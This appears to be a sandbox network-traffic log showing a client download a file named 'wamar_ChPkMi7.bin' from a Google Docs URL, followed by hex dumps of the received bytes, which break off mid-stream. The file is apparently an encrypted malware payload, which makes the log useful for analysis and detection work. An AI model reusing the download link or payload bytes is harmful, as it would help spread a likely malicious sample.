2021-12-01 18:25:38 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-10-6k-docs.googleusercontent.com Connection: Keep-Alive
2021-12-01 18:25:38 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvLqwKfM1Y-EzSuCmPggD-6ZxMOlVDL09rJ1cuAe6Aop3dFL5Ky0EcetKaHM7KZ2mVZw0lu_V3gkv_4MvEe64ehytFgWQ Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="wamar_ChPkMi7.bin";filename*=UTF-8''wamar_ChPkMi7.bin Content-Length: 156224 Date: Wed, 01 Dec 2021 18:25:38 GMT Expires: Wed, 01 Dec 2021 18:25:38 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=4R1wKw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-01 18:25:38 UTC	6	IN	Data Raw: a9 3e e5 01 df d0 81 1f 8e 73 0c 35 c6 77 5a 92 b3 87 c6 e9 89 b8 b4 3c 18 30 75 36 d3 91 4c 3a 41 80 b7 a3 cd 1f b7 c3 a2 94 5b 16 6b df d8 30 7d 04 25 47 ea 41 10 07 1b e2 07 23 e7 a8 a8 4a 46 ab c4 10 4c 1a 1a 21 96 55 fe e9 c3 7f cf eb 5b af 5f df af 8d e1 47 b7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3b 60 27 d4 32 98 b0 ff da f7 d8 4f 26 30 94 f5 39 fc 66 c1 87 81 5e a2 ba 46 9b b1 72 c0 8a e5 1c 9c 55 86 2c 0e c5 3e d0 5d 1f cc fb 58 b0 d5 83 9a c8 8f 37 9d 3a 37 86 5a cf 84 f0 de 3f 88 6e 2a 13 bb 57 e1 cc 5a cd a6 5c 1c b6 2d 06 b3 ea 14 f1 7b 85 95 8f 0f f4 37 74 f8 49 49 1b c8 96 02 d5 c5 6a 41 a9 07 1a ed 52 c4 a0 2e 06 2e 1c 56 17 c9 6a 06 fe 0b e0 3b 01 cc a2 6a a5 4f 80 6c Data Ascii: >s5wZ<0u6L:A[k0}%GA#JFL!U[_G()Xbcqd@aaE;`'2O&09f^FrU,>]X7:7Z?n*WZ\-{7tIIjAR..Vj;jOl
2021-12-01 18:25:38 UTC	9	IN	Data Raw: d4 51 cc 40 20 c8 53 d4 0d eb 57 91 72 db a3 31 a3 82 cd c1 ef f4 42 7d 01 46 ed 60 30 6a d0 ef d3 4a 45 73 7a 19 d3 bd a5 3c b5 88 b2 79 18 9b 07 08 a1 8a 5a 08 07 ed 6c 48 7b 49 94 de 5e ac a7 95 31 4d 2b 73 be 6c d9 43 5a 92 a5 ac 52 85 23 b9 03 1e 0d 52 5e de eb ba d1 51 4f 9c 52 71 51 ca 92 1d 98 95 7e 71 c0 ba 12 5c be 99 73 6b 3a c9 d0 4f 46 c0 d3 33 cc a6 0a 94 31 bf 44 91 56 93 1b 94 61 b3 cf 04 5e d3 d0 0c a9 bf e5 90 3a 9f b5 2d 0f 54 9d 3c 94 d0 39 1e 92 2d 2f f1 73 fe 81 f9 c0 d1 57 01 b5 a0 85 03 3d 4b dc ff 89 d1 11 79 4a 02 88 43 d7 08 25 17 d5 e5 e5 dc 78 fa c5 d9 9d 1d 9d 0a 58 16 93 17 f0 75 38 dc 34 1c ae 5a 6d ad 7a 53 9f 09 52 c4 27 6a 3a b4 1d 7f 81 fd 38 86 ae 53 45 cf 0a b3 2d 02 d2 ab 4e fc f3 ad 17 da 02 8b e3 27 f5 21 47 fc 16 Data Ascii: Q@ SWr1B}F`0jJEsz<yZlH{I^1M+slCZR#R^QORqQ~q\sk:OF31DVa^:-T<9-/sW=KyJC%xXu84ZmzSR'j:8SE-N'!G
2021-12-01 18:25:38 UTC	13	IN	Data Raw: 92 71 c8 c7 3d f0 fd b6 fc 3e 02 4e db 73 10 66 db 61 be 97 23 73 f0 9f c2 88 2d 40 c0 2c 43 c1 aa ac 38 c5 16 0d 3f d0 31 49 86 56 e1 25 b9 1f b2 83 24 5e 50 34 7a 3f 69 46 48 d8 b6 0f 14 fd cd 50 59 3f c4 22 2f b3 2b 4f 47 79 da ec d5 51 fc 72 47 0c 1d ac cd 6c f8 e1 79 97 b0 81 ac 55 be 15 6b 9c 86 ed 89 4a 92 9e 58 42 ee 30 7f 05 f6 a3 aa 9e b5 e7 12 ec 10 73 46 dc 52 ef 95 46 ef db 59 7b 84 19 d3 72 03 2b 7d 0b c2 ab 47 18 4c e5 54 9a 02 01 fc b4 f3 8e eb 68 e2 57 54 5f 65 a1 71 f7 ab 66 72 ee 21 5a 80 1a 0e a9 c6 e0 f6 b4 f7 2c 81 c1 a7 17 9b 9d 28 f4 ee 71 33 bf f5 96 13 20 d5 70 00 77 38 60 27 da ae da 9e 89 6d 77 68 9a 13 74 28 ff 5d 58 1e d0 b5 a1 7e 5b 1e c9 b1 f6 1f e0 62 c9 8a 1a cd c7 0c 6c ff 40 f9 e1 b2 bd c3 de 0d 07 cc c9 2b b3 0a 11 64 Data Ascii: q=>Nsfa#s-@,C8?1IV%$^P4z?iFHPY?"/+OGyQrGlyUkJXB0sFRFY{r+}GLThWT_eqfr!Z,(q3 pw8`'mwht(]X~[bl@+d
2021-12-01 18:25:38 UTC	17	IN	Data Raw: 50 3a 30 fa d4 15 b4 67 4c 0d 0b e5 d4 82 88 48 04 49 05 9f c6 1f b7 49 45 6d 29 bd a3 93 0e dd 92 4c 77 8b 42 6c bf 3c 33 58 a6 e0 11 ae 43 f9 b2 2c 92 fb fa 80 96 c8 11 4d c0 5d 4c 6f 3d 2b 4a c3 7d 0b cd d9 33 57 1c e2 22 41 de 32 5f a4 37 e0 dd 96 8e 31 c7 9a 1c de 0e 28 11 82 af 31 f6 42 f6 9c 48 f7 9f 7a e1 a7 64 af fc 39 f4 6b 28 2b 06 5e d6 2c b0 c4 81 cc 03 02 96 36 05 b6 0e da 8a 48 15 a7 87 65 b3 a0 e1 50 8c 01 2e 50 3c 37 29 4e 10 13 e1 ba ac 89 c6 6e b6 b8 77 71 b1 a1 55 a6 af 1c 18 81 15 49 fe 36 0a df 4a 47 50 87 a6 de ef ba 50 33 8f 2d b6 ee 7b 97 2c 1d b3 db 0d a1 64 57 38 76 44 30 cb 5e 91 5a 4c f9 0c 10 80 a9 a7 8a 68 67 22 04 33 9b eb ff 33 c5 dd d6 7f a8 59 ed a7 cd f6 fc 4f 7c c0 98 76 f4 ab 1d 16 37 49 f7 8a 9d 96 5f 5c 4d 7d 33 81 Data Ascii: P:0gLHIIEm)LwBl<3XC,M]Lo=+J}3W"A2_71(1BHzd9k(+^,6HeP.P<7)NnwqUI6JGPP3-{,dW8vD0^ZLhg"33YO\|v7I_\M}3
2021-12-01 18:25:38 UTC	18	IN	Data Raw: d3 ac 8f 9a 42 99 e8 3c e2 c0 ef 7c 40 1c aa 30 39 77 c6 37 5b f0 e6 23 a8 d7 64 34 0f 88 0c d4 e3 e5 d4 2b 6e 69 46 71 bb fa 0c 9f fc cd 1d 24 91 5d 9f 2e 38 e0 36 c6 b2 9f 93 57 69 88 29 22 ab e8 c6 dd b1 55 87 db e5 02 25 c9 dd be fd c7 3e f4 5f fc ef bf 7c 46 b6 9a 82 29 24 45 91 aa 59 3f 3a 91 2e 75 f8 87 38 de d2 61 b9 9b 69 a0 66 be 50 84 11 6f a5 1c 07 f1 d7 71 5f 1a d9 e6 93 cd 89 a8 3c 0b 86 ef 0a 20 7d df af d8 6a ab a6 20 a6 8c cc a3 6c 48 a3 07 22 d6 1f 2f 15 5f 2d 3e 5a ae 62 63 ac 0d c7 53 21 e9 0d e8 0a 85 99 2a 48 15 0e 74 64 cf 76 d9 dd 41 74 23 02 fd 36 bc 31 d8 b3 55 a0 e6 f8 d6 a1 2e 8e 1c e3 ed d0 49 6b 18 09 3c f6 fd f4 94 1b e1 1e 4a 0c 84 13 6d bd 56 cf 0f 0b ec e2 9f f8 ff 6e ca 57 06 67 f1 7e 48 c9 6e a1 d2 fb 18 8b 7b 5a 20 0e Data Ascii: B<\|@09w7[#d4+niFq$].86Wi)"U%>_\|F)$EY?:.u8aifPoq_< }j lH"/_->ZbcS!*HtdvAt#61U.Ik<JmVnWg~Hn{Z
2021-12-01 18:25:38 UTC	19	IN	Data Raw: 40 85 0f 9f 7a f5 78 a9 46 88 0c d0 1d 5e ba c3 0b 1a 0f 0e 1b 96 ad d8 5c cb 7f c7 e8 06 93 46 19 11 a7 2e e6 a0 21 27 88 07 73 c5 11 30 e3 ae b6 9d 91 18 f0 dc 98 4b e3 f3 db 1a 0a a2 46 5d 05 1d d5 d5 de d5 4a fe 2b 46 df aa 10 db 76 2f 16 aa 28 5b af 8f d5 19 15 3d 78 b2 79 a3 a7 1c d5 5d f6 10 bc cd 76 ae 85 f0 4d 33 ff a4 ed d5 2c 6a 73 1c de ee 99 82 8c 44 fb 30 d1 00 62 19 da a2 16 f6 3a d0 04 85 f2 33 8f 21 36 df 2d 75 09 5a dd 80 32 3f 59 df b5 5b e4 86 36 af 40 28 ff fc af 06 01 73 86 fe d6 c7 3e 52 06 a3 ca a6 5b be 93 e4 73 30 d5 20 3a 12 99 c6 d4 d5 f3 44 9f cf 52 a8 96 95 c5 bc f3 97 bc e7 c6 0c cb c4 f3 8b 3d 17 10 8b 9f 10 f0 c2 5e ae bf da 7c e8 4a e2 34 d4 c2 55 e9 35 d7 39 b4 bd f7 a9 8f 61 66 12 86 e2 74 cd 29 8a 86 c3 07 41 1b 0b e7 Data Ascii: @zxF^\F.!'s0KF]J+Fv/([=xy]vM3,jsD0b:3!6-uZ2?Y[6@(s>R[s0 :DR=^\|J4U59aft)A
2021-12-01 18:25:38 UTC	20	IN	Data Raw: 33 8b 0b 15 ee 05 8b 86 58 99 a9 46 bb 55 92 60 f6 90 4a bf fc 31 da 8b 9b 51 22 19 c8 64 75 c5 f5 15 bd 82 b7 50 99 09 16 93 67 9a 0b 3d bc b7 6c 9c 60 3a 22 1a d7 ff 00 aa 43 30 a8 ab fc db 28 75 e2 22 f0 56 4d a5 15 13 5d 5d c9 c0 d3 12 9f a2 eb 7c a3 72 9c c5 16 96 6e e2 3a bb ce 4c d2 64 ea 25 d2 a1 50 fe 1b 0f 4a 30 15 f2 83 65 da b8 0e fd 7f 4d ad 34 2d a2 05 8c 9c 84 cd cc 72 fd 6d 32 5f 3a 2b ef 65 6c 55 a0 83 36 90 91 9b fa 17 ed 49 bd 7b 41 b2 29 c9 af 76 79 3f 88 6e a7 4d 3c 8d 02 3f b9 35 2d 73 8b b2 0e 2c 8b f9 44 98 33 42 9e 83 70 e8 c8 6f bd 91 e9 ef e6 52 1a 31 c1 0a 78 69 d2 f6 60 f2 00 aa 14 b2 63 3b be 0d e4 bf 97 97 83 28 6b 1a 7e 46 8d 30 79 93 93 4c 64 d3 30 80 76 86 57 e4 52 d2 f6 e5 6e 81 47 78 62 63 d1 6b 72 f9 f5 9b 8c 4a 1a 22 Data Ascii: 3XFU`J1Q"duPg=l`:"C0(u"VM]]\|rn:Ld%PJ0eM4-rm2_:+elU6I{A)vy?nM<?5-s,D3BpoR1xi`c;(k~F0yLd0vWRnGxbckrJ"
2021-12-01 18:25:38 UTC	22	IN	Data Raw: 41 ed 0e 36 d9 78 3b f6 83 cc bc c6 5d f6 ee 7c a8 6f 75 2a 82 86 52 47 b3 d8 16 5e d3 d8 a6 a0 03 d6 cb 64 42 fd 87 0a 56 e5 17 83 5d eb ac c9 4e 8b 69 84 3f e4 9b cf 20 59 b0 c9 5a 9b 66 cd c0 51 71 55 95 4f ba 9c af 64 4b 7d 01 06 06 ff b7 e5 ee ae 76 c9 1e c8 33 68 12 a4 c8 5e 28 73 46 ca 20 3a 66 24 3e f2 6e 00 53 ad ed 45 92 e8 ac 64 6a f9 73 02 44 b2 02 cb 82 27 46 c9 e8 28 00 52 80 59 71 42 1b 53 51 39 6d 9a cf f7 d0 c2 eb d2 d4 80 fe 3f db 8b b6 66 19 21 22 6e 6c 4c e1 4f fb 79 4a 2f fa 61 fc c3 1d 2b ec f2 af b2 3e 8f e1 24 4d 9d d3 9b d7 ed 83 c8 57 d0 41 f0 1d a7 37 f9 be d6 5c 6d 4a 7d 2d 17 29 0b 05 ae 6b 5f c1 4c 25 e0 43 7f 78 a8 5f 4b 24 e3 e9 27 3f 29 4f 77 7c 08 a3 38 8a e1 c6 20 db fe a6 1e f0 95 2b b9 27 1a 47 eb 55 5d 9e 0f 4b a7 1c Data Ascii: A6x;]\|ou*RG^dBV]Ni? YZfQqUOdK}v3h^(sF :f$>nSEdjsD'F(RYqBSQ9m?f!"nlLOyJ/a+>$MWA7\mJ}-)k_L%Cx_K$'?)Ow\|8 +'GU]K
2021-12-01 18:25:38 UTC	23	IN	Data Raw: 39 e7 a8 e1 96 2a 29 56 5f 44 f7 12 28 a4 32 2c 2d 3b 34 6a fe 15 86 d1 3e d8 38 93 58 8b 5e fb 25 9c d4 d5 21 2e d6 5f 97 a8 84 f1 94 3e f2 e5 c9 a4 1e a2 42 75 b5 7a 18 9f 91 cc 42 18 67 ae f6 db 88 8f 57 c5 67 f6 96 48 c9 6e c3 9b 3c da 8f 11 99 78 4e a9 d4 5a 2d 69 84 83 e2 1a fb 12 ce 6b c9 df 31 c8 41 9c cd 16 65 7e 02 31 ab 8d 45 a5 36 f8 ed b6 af 7a c6 14 e7 74 01 f7 29 40 af 1c ef 7b 7a e5 e7 0c 61 41 89 06 60 9e c0 20 1e 68 77 15 a7 61 27 b9 56 ff 6a 0c 03 9b 54 3c f6 a1 b9 f8 0b 52 73 b5 14 86 1c 27 3e 39 f1 4b e2 e7 5a 85 b3 98 11 ce e2 44 4a b7 3e 5c 3a 83 59 79 b8 cc 6b 0b 2b 9e 7c 83 42 34 8d 24 2d 0b cd b4 ed 03 51 88 0a e0 28 c0 8f 6e 4b 8a 29 d6 f2 b8 53 be 1d 8f 97 44 49 40 25 a4 f0 1f e9 76 20 4a b1 3d 95 8f f5 e2 06 c3 46 a5 5f cd bd Data Ascii: 9*)V_D(2,-;4j>8X^%!._>BuzBgWgHn<xNZ-ik1Ae~1E6zt)@{zaA` hwa'VjT<Rs'>9KZDJ>\:Yyk+\|B4$-Q(nK)SDI@%v J=F_
2021-12-01 18:25:38 UTC	24	IN	Data Raw: 4c 9c 22 1b f8 64 7d be e7 a1 de 6e 70 52 8b 89 b9 5c a6 df f3 38 72 1f ba e6 ad 39 d2 21 c1 80 fd 9f 74 1f a8 d4 c1 bb 36 65 a2 f2 3a 28 c2 8e 55 ba 48 dc 77 f0 fc 57 2c 2f 3d 80 1c f0 80 88 b5 1e 40 00 e0 30 d7 dd ed 89 71 cd 76 e7 22 83 bb 75 90 ce c2 48 a9 6d 23 ef 49 9a 3a 06 f0 7b 5e 85 9d 68 16 c8 19 d9 98 41 7d c6 f4 da 7a 5a c6 eb fb c1 08 ac dc ef ec 05 02 96 a0 4c 89 70 00 bc 5d a5 58 5b 0b 7b 0a fe 21 bb 14 18 fc 8d e1 59 d7 f3 62 ef 46 d3 fe 56 8f 58 e6 6a b9 5b 94 43 6b 1a 1d a1 cd a3 24 26 a5 55 bf 54 7a e1 5b c1 33 80 ef 38 64 bc dd 5e e4 b5 a5 b6 9d 98 60 d6 9e cc fd d1 f4 ee 40 7a 9b ab 8a 51 15 98 4a e3 c6 76 6d 6d b9 b4 5c 4b 61 d1 23 33 29 75 31 75 f2 3b 81 60 aa ee 76 48 0c ee ad b5 59 85 3b 2b d4 f1 f3 6f 25 9c ea 48 fb 99 b0 b2 f5 Data Ascii: L"d}npR\8r9!t6e:(UHwW,/=@0qv"uHm#I:{^hA}zZLp]X[{!YbFVXj[Ck$&UTz[38d^`@zQJvmm\Ka#3)u1u;`vHY;+o%H
2021-12-01 18:25:38 UTC	26	IN	Data Raw: b8 db d3 50 1e 8b 13 e4 64 3e 66 47 26 69 f0 cb 2d 36 dd 25 53 d9 7a 02 61 4c c4 bc a5 27 4a ed b6 4c 12 3b a3 e8 7d 1b 0b c1 04 b1 e5 30 5c b6 60 7e bd 9a be d9 e1 21 67 c0 cc ac 68 77 15 1a 1c 39 f0 d6 c5 6e 81 46 c4 02 b9 cc 14 51 bc f7 a9 8c 38 d2 9a 46 de 18 3d 9a b2 37 6c ec 40 7d 84 f8 39 1f f3 36 d2 7a bf 34 52 0d 91 66 da 36 fa a0 c3 1b fe 8a 3a 09 93 a5 5c c9 e2 86 2d 8d 77 cd bf 18 3b 81 7e 4a 2c f3 29 0d db 9a 48 f5 77 11 84 46 4f 81 5b 7d 61 66 35 cc 0d d3 83 7e 89 48 f3 50 b4 7d a1 34 63 bb c6 3b 7a 79 74 0c 88 04 1b 6e dc 04 95 9e 9a 1c eb 3a cb e6 75 20 4d 4e 87 3f b6 d8 26 f1 5c d7 b8 f2 92 3b f8 f2 f2 4a 5a 0c b2 a4 09 64 2a 38 48 73 53 1d f0 c5 5a 05 6e b3 ec 7e 47 9c d7 86 08 51 3b 12 4d 8e ef 9c d3 3d e6 a8 d1 4c 38 04 f0 a5 9e 7d 42 Data Ascii: Pd>fG&i-6%SzaL'JL;}0\`~!ghw9nFQ8F=7l@}96z4Rf6:\-w;~J,)HwFO[}af5~HP}4c;zytn:u MN?&\;JZd*8HsSZn~GQ;M=L8}B
2021-12-01 18:25:38 UTC	27	IN	Data Raw: 2e e2 00 99 0d 08 3e d9 82 95 cf 93 2c 63 91 83 dd 77 42 1d ee 0f b7 af 1f 76 d1 e8 53 66 02 cb e2 51 8e 6e 81 27 7c 6f b3 86 60 b8 3f 92 62 d5 91 05 e6 0a 03 d7 44 eb 8d 1f dc f3 1a 28 7a 7b 40 52 9a fe c1 36 10 d4 2b e9 5b f7 67 e6 4e 29 57 4c d7 b4 00 b9 8a e1 97 47 8a cf 03 df f0 4c 16 72 37 4e dd 64 69 30 c2 66 be c4 4c b1 a4 b9 fc 3e 02 9c 64 35 70 c6 05 bf 9b 4d e5 f6 92 0e 41 eb 8d 48 8f 6a a8 2d 0f 21 75 b1 87 8f 7d 51 ff 21 dd df 5f 63 be 5e 54 07 62 67 6d fa 5f c0 3f cd 00 49 b0 4c 19 fd b9 e2 52 97 d0 51 27 39 a4 2a c7 f0 89 93 13 9e 70 29 b7 e1 a6 a8 d3 6a f0 15 2a d8 f2 c3 84 19 b6 0d 5b cd 4a 2b 34 aa 08 1d 15 be e0 82 08 40 d8 cb f1 57 fd ff 6d 83 24 2a 15 62 04 2f 1c 13 98 f9 28 bb 31 9a 7a 11 69 ac 61 04 68 a3 6d 47 91 5f dd 9d e3 35 e6 Data Ascii: .>,cwBvSfQn'\|o`?bD(z{@R6+[gN)WLGLr7Ndi0fL>d5pMAHj-!u}Q!_c^Tbgm_?ILRQ'9p)j[J+4@Wm$*b/(1ziahmG_5
2021-12-01 18:25:38 UTC	28	IN	Data Raw: 6f d1 0d 72 ba 28 66 ef ec 32 cf f9 55 52 0b 41 21 57 be 36 57 9d a2 79 47 e5 09 0d 0e 61 f7 8c c7 4b cf 58 21 4a 25 3f a9 7e 97 b6 0c e3 4b fb 26 4d 61 41 ed 17 39 52 d4 78 96 ca 92 87 88 4f 3c 66 3e 17 e3 58 c8 c9 5a 3d e3 49 bd ca 1b c8 63 5a b7 5b b3 51 77 6b 49 6c a2 97 9d 62 b5 0d c2 ab 47 62 a9 c0 9f 1d 0c 49 54 b3 fb 5c 11 41 19 e7 3f d5 99 8c 70 ae ad 3f 74 93 48 5e 90 3c 26 7a 17 d7 4e b9 31 54 10 83 b7 4e c1 86 89 f4 76 86 04 59 4a 13 01 49 5b ae 6d e1 cf ea f1 ae 6c 54 60 ab 4a 34 2e 68 88 9d ab 81 5e 97 d6 d2 a7 11 ca e3 3f 29 74 d3 c5 1b 56 63 3b 5e 0a 00 58 e4 b4 1a 89 bf bd 11 24 76 ee 51 ef 51 b6 be 35 25 19 a2 f4 82 cf ad c0 e2 c1 ed 2b 5c d9 b7 0d 8c 15 80 8d 28 dd 9c 9d 5a 37 a3 2f 9b 6a fd 3a 9f 8a e8 17 bd fd 15 d9 d0 9b 03 9d 68 63 Data Ascii: or(f2URA!W6WyGaKX!J%?~K&MaA9RxO<f>XZ=IcZ[QwkIlbGbIT\A?p?tH^<&zN1TNvYJI[mlT`J4.h^?)tVc;^X$vQQ5%+\(Z7/j:hc
2021-12-01 18:25:38 UTC	29	IN	Data Raw: ec 42 d2 d2 c3 e1 c2 be 0e 58 35 2b d3 bc e7 ee 59 30 17 27 aa 6d 61 fc f5 a7 38 49 34 2d 6c dc ba 2d 33 44 2b a9 18 e5 ce 46 86 57 53 0e 1f f3 69 fd f8 b5 95 fe 4c 1a 56 f3 59 74 fd a9 e2 93 e3 bd 1f b6 3b 13 77 af 3d 79 72 e3 4c 42 91 5c dd 7a fe 8e dc 62 d5 d2 51 e7 b0 6b 01 0a 58 a4 5d e6 a5 bd c9 24 b3 ec 7d 0d 68 f8 05 a2 d9 ce b3 cd de 56 26 ac 0d ca a5 72 ef ab 97 90 83 ae 7f fc a8 67 96 60 ad 7b 02 d5 2a a5 48 03 80 bc 8c 71 97 a4 27 e4 42 42 d2 0d d7 52 15 bf ca 30 51 23 88 19 57 95 13 93 5f 02 e5 ee cc 23 22 65 5d 54 ea 51 e2 89 c4 ee 13 05 5d 89 76 1c 80 3c ec 0a d3 58 26 4c e9 5d e3 a4 eb 26 45 0b 41 9c b3 ed 0d 04 d1 a7 a0 14 b2 46 ce 8a e1 e4 7b c6 fb d0 fc a6 3f db 6c 15 74 18 3b d7 9b 4b 70 c7 e4 fe e3 90 cd 62 ad fb 31 29 0d 37 22 b1 30 Data Ascii: BX5+Y0'ma8I4-l-3D+FWSiLVYt;w=yrLB\zbQkX]$}hV&rg`{*Hq'BBR0Q#W_#"e]TQ]v<X&L]&EAF{?lt;Kpb1)7"0
2021-12-01 18:25:38 UTC	31	IN	Data Raw: 9b fb 96 61 57 e2 92 01 10 ff 54 04 9d cd d8 de be 2a 6c bd 56 63 dd 8c be 18 70 d8 e7 7a 9a 46 77 bc c4 bf 96 c5 84 17 28 59 f3 38 30 66 13 d7 c2 3f 9f 55 4a 6b 80 b7 c3 a0 b0 b9 86 07 59 e8 b1 ed bd 93 da 23 f5 47 61 16 6e 2e e8 6c aa 8a 6a 79 a9 2b 31 e5 f7 71 55 c0 5b e9 29 78 6d 0a db 25 ba 03 86 ed 2d 35 04 1b 00 58 b0 fe 12 8a d7 aa 32 9e 9e 0c 54 ec 18 95 7c cf 26 ab cf be c2 2c 7e 85 e5 3a 28 2f bb b9 08 5b bf 17 90 95 08 ee 24 16 5b ce ec 84 d8 35 9b 87 e0 fc 29 a0 a7 b7 44 1d 35 e4 09 56 a8 23 07 a3 37 37 68 b4 a4 de 86 c8 d9 36 00 79 0a 76 80 68 59 52 e1 96 de f4 73 f8 34 db b7 80 0d 05 89 42 5d 5a d3 0b 84 0d 45 80 23 16 14 4a d6 0f d6 6a 03 01 14 59 5a e5 7c e8 85 fe e4 04 f7 81 e8 bd b1 72 f3 4c 47 d2 0a b6 ec 3f 5e 94 18 28 66 43 12 39 da Data Ascii: aWT*lVcpzFw(Y80f?UJkY#Gan.ljy+1qU[)xm%-5X2T\|&,~:(/[$[5)D5V#77h6yvhYRs4B]ZE#JjYZ\|rLG?^(fC9
2021-12-01 18:25:38 UTC	32	IN	Data Raw: a5 a1 4d 7e 2e 3e b4 2c c2 b9 33 f0 72 78 07 da e9 b7 2b d9 c5 93 51 64 7c be 76 ba ac fe 5f ea 94 0a 4c b4 71 fd 19 cf 91 81 30 f6 9b 6e 63 6d 29 72 4a f9 b0 38 fe 06 4e 07 c1 88 c4 cd a8 27 d5 d2 e1 ee f3 8e 27 52 59 3b 19 85 d1 b0 e5 97 6d b6 01 16 2e 38 80 cf d2 97 8b 13 d0 2b 7d e1 47 f7 20 3d bd c6 0c e1 ca 68 35 a8 c6 e0 96 d1 99 10 a6 9a 57 e6 4d f4 80 82 22 35 40 50 69 96 45 71 85 e4 c8 cf 1e 34 ae ae 09 3e 56 e6 6a fe 15 eb 5e 45 88 6e 95 ec 2a bc a4 5e 9a f4 55 21 e9 d0 e0 54 cd 0c 72 f2 3a a1 f3 d8 84 96 a2 28 71 bd 19 c2 6f e6 d8 36 fd 42 2a b8 5f 49 00 99 2d fb 31 21 c0 77 19 32 9e 74 fe c7 93 92 ed 59 47 50 15 29 b2 9c 95 ce ea 80 eb 86 4f e1 f0 54 5b c9 22 26 ab 64 7b 8f 75 e5 95 95 39 e6 ea bd e0 72 dc bc 56 cc 78 56 f3 29 c9 1c 3e fb 5d Data Ascii: M~.>,3rx+Qd\|v_Lq0ncm)rJ8N''RY;m.8+}G =h5WM"5@PiEq4>Vj^En^U!Tr:(qo6B_I-1!w2tYGP)OT["&d{u9rVxV)>]
2021-12-01 18:25:38 UTC	33	IN	Data Raw: 5f 72 c2 0b db d8 a4 8c c0 cc f5 06 a1 02 b7 6d 05 0a f4 8b b0 a5 4c 95 02 ca 08 ed 4a 98 84 7a c7 1e 01 2f ab 3b 0a 51 f0 ee 7d 83 4d 4d c0 e5 7b 32 2f 49 6d 3d 18 cc 1d 3b 7c 7e ec 44 59 10 36 28 63 57 6e e7 de fc 7d fd 14 76 ce 32 af 9d 6f 4f 12 78 6b 82 8a 99 3f 8c 6f 8f 07 79 df 2d af a9 b2 08 75 4d 4d 9d 03 b5 c1 8d 79 c9 a1 48 b4 22 82 17 d1 b9 69 d7 e0 dc 38 c1 2e 3f c2 57 63 21 93 6c 28 db 0b 67 ef f6 42 12 a7 60 ab 41 b3 fc 61 5f 92 9c e1 fd 68 65 24 5f d0 31 f3 15 87 f7 c7 25 8c bc 50 e1 23 95 3c 56 06 c9 0c c5 08 4f b9 f6 d0 a8 43 0a c4 90 fe b2 fd 70 e8 8f ea 7b dd 7b 4f 19 8c 29 32 89 22 7d 70 90 45 9d 84 